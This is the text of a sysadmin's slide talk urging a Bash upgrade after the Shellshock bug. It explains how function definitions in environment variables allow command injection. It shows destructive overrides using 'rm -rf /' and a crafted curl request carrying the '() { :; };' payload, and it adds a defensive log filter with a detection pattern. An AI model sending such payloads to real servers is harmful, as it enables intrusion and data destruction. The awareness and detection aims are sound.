Shellshock
Greg Karékinian
I'm a concerned sysadmin.
PSA: UPGRADE YOUR BASH. NOW.
TL;DR: UPGRADE YOUR BASH. NOW.
https://shellshocker.net/
Debian/Ubuntu
sudo apt-get update &&\
sudo apt-get install --only-upgrade bash
Red Hat / Fedora / CentOS
sudo yum -y update bash
Bash incorrectly handled trailing code in function definitions
You can set environment variables to functions
What is an environment variable?
set environment variable
$ RAILS_ENV=production \
bundle exec rails server
set environment variables to functions
$ hi='() { echo "Oh hi"; }' \
bash -c hi
Oh hi
set environment variables to functions
$ env hi='() { echo "Oh hi"; }' \
bash -c hi
Oh hi
set environment variables to functions
$ export hi='() { echo "Oh hi"; }'
$ bash -c hi
Oh hi
Like a closure / lambda / anonymous function!
Environment variable command injection
env
$ env /bin/ls='() { rm -rf /; }' \
bash -c /bin/ls
export
$ export ls='() { rm -rf /; }'
I'm a web developer, why should I care?
Everyone should care. Software is everywhere.
Demo: overriding commands in environment variables
I couldn't make it work. But I'm curious.
It works! It works so well, it's SCARY.
Malicious requests
curl localhost:3000/?"() \{ :; \};\
touch /tmp/lala"
Malicious requests
"() \{ :; \}; touch /tmp/lala"
That code is now going to run on EVERY REQUEST
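Added example, not from the original slides: a POSIX shell filter that flags access-log lines containing the function-definition prefix `() {` seen in the requests above, including the backslash-escaped and percent-encoded spellings. It scans the whole log line rather than only the query string; the log lines, addresses and function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag logged requests that carry a Bash function-definition prefix.

# "()" then optional whitespace, optional backslash, then "{", raw or percent-encoded.
SHELLSHOCK_RE='(\(\)|%28%29)([[:space:]]|%20|\+)*(\\|%5C)?([{]|%7B)'

# Constructed access-log lines; the addresses are documentation ranges.
sample_log() {
cat <<'EOF'
192.0.2.10 - - [25/Sep/2014:10:00:01 +0000] "GET /posts HTTP/1.1" 200 512
198.51.100.7 - - [25/Sep/2014:10:00:02 +0000] "GET /?() \{ :; \}; touch /tmp/lala HTTP/1.1" 200 512
198.51.100.7 - - [25/Sep/2014:10:00:03 +0000] "GET /?%28%29%20%7B%20%3A%3B%20%7D%3B%20touch%20/tmp/lala HTTP/1.1" 200 512
192.0.2.10 - - [25/Sep/2014:10:00:04 +0000] "GET /docs/foo() HTTP/1.1" 404 0
203.0.113.5 - - [25/Sep/2014:10:00:05 +0000] "GET /?()%20{ :; }; touch /tmp/lala HTTP/1.1" 200 512
EOF
}

# Print the log lines on stdin that contain the prefix anywhere in the line.
flag_requests() {
    grep -iE "$SHELLSHOCK_RE" || true
}

# Count the flagged lines on stdin (prints 0 when nothing matches).
count_flagged() {
    grep -ciE "$SHELLSHOCK_RE" || true
}

# Flagged requests per client address, busiest first ("<count> <address>").
flagged_clients() {
    flag_requests | awk '{ n[$1]++ } END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Summary for the constructed sample.
sample_log | flagged_clients
```

A hit only shows that a request carried the pattern; whether anything ran depends on whether the Bash behind the server was already upgraded.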
Why did anyone think that "feature" could be useful?
Passenger doesn't run as root (usually)
Steal database credentials
Install malware, create botnets, DDoS
What else uses bash and CGI scripts?
Routers. Cheap routers. They're everywhere.
Where do we go from here?
Security and human nature:
Wait until something goes TERRIBLY WRONG.
unattended-upgrade all the fucking time.
"The code parsing the code to avoid code execution may allow code execution."
https://twitter.com/patio11/status/515920193491451904
Thoughts?